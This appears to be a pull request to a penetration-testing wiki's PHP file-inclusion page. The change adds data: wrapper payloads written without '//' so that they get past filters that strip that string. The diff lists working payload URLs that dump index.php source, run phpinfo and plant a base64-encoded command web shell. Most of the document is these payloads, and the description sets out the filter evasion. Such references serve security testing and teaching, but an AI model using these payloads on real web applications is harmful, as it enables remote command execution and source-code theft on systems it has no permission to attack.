### PR TITLE
"//" Sub-String in Parameter is not Necessary and Could be Filtered

### DIFF
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -227,6 +227,9 @@ http://example.com/index.php?page=zip://shell.jpg%23payload.php
 http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
 http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
 http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
+http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
+http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
+http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
 NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 ```
 


### PR DESCRIPTION
@carlospolop, In case the target system filters out the string "//" in the page parameter, I propose that extra lines be added to indicate to the user that the "//" string is not necessary.

Otherwise, if this is too verbose, I can propose to add in one example of this instead of three.